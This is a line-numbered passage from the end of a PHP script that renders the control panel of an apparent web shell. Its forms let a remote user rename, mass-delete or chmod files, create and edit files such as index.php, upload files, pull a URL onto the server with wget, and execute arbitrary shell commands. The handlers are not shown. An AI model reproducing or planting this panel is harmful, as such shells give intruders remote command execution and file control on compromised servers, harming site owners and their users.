1444 <td><a href='?rename=$file&rdir=$dir'>Rename</a></td>
1445 <td><input type='checkbox' name='massbox[]' value='$dir/$file'></td>
1446 </tr>
1447html;
1448}
//Close the listing and render the mass-action controls that post to the 'mass_action'
//handler above; the default chmod value is the string '077'.
1449echo <<<html
1450 </table>
1451 </div>
1452<div style='position:absolute; right:0%;'>
1453 <select name='action'>
1454 <option value='delete'>Delete</option>
1455 <option value='chmod'>chmod</option>
1456 </select>
1457 <input type='text' name='chmod_value' class='text' value='077' size='9'>
1458 <input type='submit' name='mass_action' value='Do Action'>
1459</div>
1460</form>
1461<br>
1462<br>
1463<br>
1464html;
1465
//Writeability badge for $dir, reused by the create/upload forms below.
1466if(is_writeable($dir)) {
1467 $writeable = "<font color='green'><b>[ Writeable ]</b></font>";
1468} else {
1469 $writeable = "<font color='red'><b>[ Not Writeable ]</b></font>";
1470}
//Quick-action forms. Each submits to a handler above: create_file, create_dir, edit (GET),
//dir (GET), do_upload (multipart), do_wget and exe_cmd. $dir is interpolated into the
//default values without escaping.
1471echo "<table width='100%' border='1'>
1472 <tr>
1473 <td>
1474 <center>
1475 <form action='' method='post'>
1476 Create File:<br>
1477 <input type='text' name='create_file_path' size='55' value='$dir/newfile.php'>
1478 <input type='submit' name='create_file' value='Create'><br>
1479 $writeable
1480 </form>
1481 </center>
1482 </td>
1483 <td>
1484 <center>
1485 <form action='' method='post'>
1486 Create Directory:<br>
1487 <input type='text' name='create_dir_path' size='55' value='$dir/newdir'>
1488 <input type='submit' name='create_dir' value='Create'><br>
1489 $writeable
1490 </form>
1491 </center>
1492 </td>
1493 </tr>
1494 <tr>
1495 <td>
1496 <center>
1497 <form action='' method='get'>
1498 Edit File:<br>
1499 <input type='text' name='edit' size='55' value='$dir/index.php'>
1500 <input type='submit' value='Edit'>
1501 </form>
1502 </center>
1503 </td>
1504 <td>
1505 <center>
1506 <form action='' method='get'>
1507 Go To Directory:<br>
1508 <input type='text' name='dir' size='55' value='/tmp'>
1509 <input type='submit' value='Go'>
1510 </form>
1511 </center>
1512 </td>
1513 </tr>
1514 <tr>
1515 <td>
1516 <center>
1517 <form action='' method='post' enctype='multipart/form-data'>
1518 Upload To Directory:<br>
1519 <input type='text' name='upload_dir' size='55' value='$dir'><br>
1520 <input type='file' name='upload_file'>
1521 <input type='submit' name='do_upload' value='Upload'><br>
1522 $writeable
1523 </form>
1524 </center>
1525 </td>
1526 <td>
1527 <center>
1528 <form action='' method='post'>
1529 wget file:<br>
1530 <input type='text' name='wget_file' size='55' value='http://'>
1531 <input type='submit' name='do_wget' value='wget'>
1532 </form>
1533 </center>
1534 </td>
1535 </tr>
1536 <tr>
1537 <td colspan='2'>
1538 <center>
1539 <form action='' method='post'>
1540 Execute Command:<br>
1541 <input type='text' name='command' size='65'>
1542 <input type='submit' name='exe_cmd' value='Execute'>
1543 </form>
1544 </center>
1545 </td>
1546 </tr>
1547 </table>
1548 <br>
1549 <br>";
1550
1551?>